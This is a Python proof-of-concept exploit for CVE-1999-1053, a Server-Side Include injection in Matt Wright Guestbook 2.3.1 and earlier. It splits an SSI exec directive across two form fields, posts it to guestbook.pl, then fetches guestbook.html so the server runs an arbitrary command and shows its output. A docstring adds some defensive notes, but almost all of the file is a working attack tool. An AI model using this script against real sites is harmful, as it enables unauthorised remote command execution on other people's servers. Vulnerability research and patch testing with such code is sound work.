POC / CVE-1999-1053-PoC.py PY
#!/usr/bin/env python3

import requests
import string
import random
import argparse
from bs4 import BeautifulSoup
from colorama import Fore, init

def banner():
	"""Print the author credits and CVE summary between two ruled lines."""
	rule = f'+{"-" * 15}Banner{"-" * 15}+'
	details = '''Author: siunam (https://siunam321.github.io/)
Original author: Patrick
Original Exploit-DB exploit script: https://www.exploit-db.com/exploits/9907
CVE ID: CVE-1999-1053
Description: CVE-1999-1053 Server-Side Include injection vulnerability in Matt Wright Guestbook <= 2.3.1'''

	print(rule)
	# The yellow colour is not reset here; the entry point calls
	# init(autoreset=True), so colorama resets it after this print.
	print(Fore.YELLOW + details)
	print(rule)

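def main(url, payload):
	"""Submit one guestbook entry carrying an SSI exec directive, then read it back.

	The entry is POSTed to ``<url>/cgi-bin/guestbook.pl``. The guestbook page
	``<url>/guestbook.html`` is then fetched, and the text of its first ``<b>``
	element, up to the first ' - ', is printed as the output.

	Args:
		url: Base URL of the site hosting the guestbook.
		payload: Command string placed inside the ``<!--#exec cmd="...">``
			directive.

	Returns:
		None. Progress and results are printed to stdout.

	Defensive notes:
		The request only has an effect when the web server parses
		guestbook.html for Server-Side Includes with ``exec`` allowed and
		the guestbook script writes the submitted fields into that page
		unescaped (presumably the case for the affected versions named in
		the banner). On Apache, ``Options IncludesNOEXEC`` keeps includes
		but disables the ``exec`` directive; removing the SSI handler from
		the guestbook page or HTML-escaping ``<`` and ``>`` in stored
		fields closes the issue at the source. A POST body sent to
		guestbook.pl that contains ``<!--#exec`` is a direct indicator for
		access-log review or a WAF rule.
	"""
	# Without a timeout, requests waits indefinitely on an unresponsive host.
	timeout = 10

	# Opening half of the SSI exec directive
	ssi_exec = '<!--#exec cmd='

	def filler():
		# The remaining form fields carry no meaning; random letters suffice.
		return ''.join(random.choices(string.ascii_letters, k=20))

	data = {
		'realname': filler(),
		'username': filler(),
		'url': filler(),
		'city': filler(),
		'state': filler(),

		# The directive is split across two fields: 'comments' opens it and
		# 'country' supplies the closing '-->'. NOTE(review): presumably a
		# complete directive inside a single field would be filtered by the
		# script; that filter is not visible in this file.
		'country': '-->',
		'comments': f'''{ssi_exec}"{payload}"''',
	}

	# Send the entry. Only network-level failures are caught, so Ctrl-C and
	# programming errors are no longer swallowed by a bare except.
	try:
		print(f'[+] Sending the payload: {payload}')
		requests.post(url + '/cgi-bin/guestbook.pl', data=data, timeout=timeout)
	except requests.RequestException:
		print('[-] Unable to send the payload...')
		print('[-] Maybe the target doesn\'t enable guestbook.pl script and Server-Side Include (SSI) script handler enabled for the .html file type??')
		# Nothing was submitted, so the newest entry on the page would belong
		# to someone else; do not report it as output.
		return

	# Fetch the guestbook page so the server processes the stored entry.
	try:
		print('[+] Triggering the payload...')
		get_req = requests.get(url + '/guestbook.html', timeout=timeout)
	except requests.RequestException:
		print('[-] Unable to trigger the payload...')
		return

	soup = BeautifulSoup(get_req.text, 'html.parser')

	# The first <b> element is treated as the newest entry.
	first_bold = soup.find('b')
	if first_bold is None:
		# No <b> element: the page is not the expected guestbook layout.
		print('[-] Unable to trigger the payload...')
		return

	print('[+] The output on the guestbook:')
	print(f'+{"-" * 15}Output{"-" * 15}+')

	# Drop the date that follows ' - ' and keep only the leading text.
	result = first_bold.getText().split(' - ')
	print(Fore.RED + result[0].strip())
	print(f'+{"-" * 15}Output{"-" * 15}+')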

if __name__ == '__main__':
	# Command-line interface: the target URL and the payload are both mandatory.
	cli = argparse.ArgumentParser(
		description='A Proof-of-Concept(PoC) Python3 script to exploit CVE-1999-1053 Server-Side Include injection vulnerability in Matt Wright Guestbook <= 2.3.1',
	)
	cli.add_argument(
		'-u', '--url',
		type=str,
		required=True,
		help='Target full URL. E.g: http://domain.here/',
	)
	cli.add_argument(
		'-p', '--payload',
		type=str,
		required=True,
		help='Payload. Default SSI payload: <!--#exec cmd="<payload_here>"',
	)
	options = cli.parse_args()

	# With autoreset=True colorama resets the colour after every print call.
	init(autoreset=True)

	banner()

	# Run the proof of concept with the parsed arguments.
	main(url=options.url, payload=options.payload)